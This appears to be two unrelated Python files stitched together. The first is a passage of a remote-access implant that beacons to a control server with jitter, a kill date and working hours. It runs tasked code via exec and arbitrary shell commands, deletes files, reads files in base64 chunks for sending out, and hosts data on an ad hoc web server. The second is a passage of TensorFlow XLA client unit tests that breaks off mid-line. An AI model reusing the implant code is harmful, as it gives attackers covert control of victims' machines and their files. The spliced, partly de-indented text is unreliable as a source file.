                 args=(), kwargs={}, Verbose=None):
        Thread.__init__(self, group, target, name, args, kwargs)
        self._return = None
    def run(self):
        # _target/_args/_kwargs are the Python 3 threading.Thread attributes
        if self._target is not None:
            self._return = self._target(*self._args,
                                        **self._kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
        self.run = self.__run # Force the Thread to install our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code)
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
    # create/start/return the thread
    # call job_func so the sys output data can be captured
codeThread = KThread(target=job_func)
codeThread.start()
jobs.append(codeThread)
def job_func():
try:
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
# now call the function required
# and capture the output via sys
method()
sys.stdout = old_stdout
dataStats_2 = mystdout.getvalue()
result = build_response_packet(110, str(dataStats_2))
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" %(e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
            s.wfile.write(data.encode('UTF-8'))
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
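# e.g. permissions_to_unix_name(0o754) == 'rwxr-xr--'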
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr,user,group,mtime,fsize,unit,fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command,cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, b64=True):
    # the flag is named b64 so it doesn't shadow the base64 module
    if not os.path.exists(filePath):
        return ''
    f = open(filePath, 'rb')
    f.seek(offset, 0)
    data = f.read(chunkSize)
    f.close()
    if b64:
        return base64.b64encode(data)
    else:
        return data
################################################
#
# main agent functionality
#
################################################
while(True):
try:
        if workingHours != '' and 'WORKINGHOURS' not in workingHours:
            try:
                start,end = workingHours.split('-')
                now = datetime.datetime.now()
                # anchor the parsed HH:MM values to today so the comparison
                # with the full datetime below is meaningful
                startTime = datetime.datetime.strptime(start, "%H:%M").replace(year=now.year, month=now.month, day=now.day)
                endTime = datetime.datetime.strptime(end, "%H:%M").replace(year=now.year, month=now.month, day=now.day)
                if not (startTime <= now <= endTime):
                    # sleep until the start of the next window
                    sleepTime = startTime - now
                    if sleepTime.total_seconds() < 0:
                        sleepTime += datetime.timedelta(days=1)
                    time.sleep(sleepTime.total_seconds())
            except Exception as e:
                pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
        if killDate != "" and 'KILLDATE' not in killDate:
            now = datetime.datetime.now().date()
            killDateTime = None
            try:
                killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
            except:
                pass
            if killDateTime and now >= killDateTime:
                msg = "[!] Agent %s exiting" %(sessionID)
                send_message(build_response_packet(2, msg))
                agent_exit()
        # exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1,jitter)
minSleep = int((1.0-jitter)*delay)
maxSleep = int((1.0+jitter)*delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
    self.assertEqual(len(proto.computations), 1)
    self.assertEqual(len(proto.computations[0].instructions), 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_cpu_custom_call_target(name, fn)
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(np.float32, (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.float32, (), ()),
xla_client.Shape.array_shape(np.float32, (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the
  op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
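    # dimension_numbers is ((lhs_contracting_dims, rhs_contracting_dims),
    # (lhs_batch_dims, rhs_batch_dims)): contract lhs dim 2 with rhs dim 1
    # and batch over dim 0 of both operands, matching np.matmul below.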
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
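# The Conv tests below use XLA's default NCHW/OIHW layout: lhs is
# (batch, in_channels, height, width) and rhs is
# (out_channels, in_channels, kernel_height, kernel_width).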
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
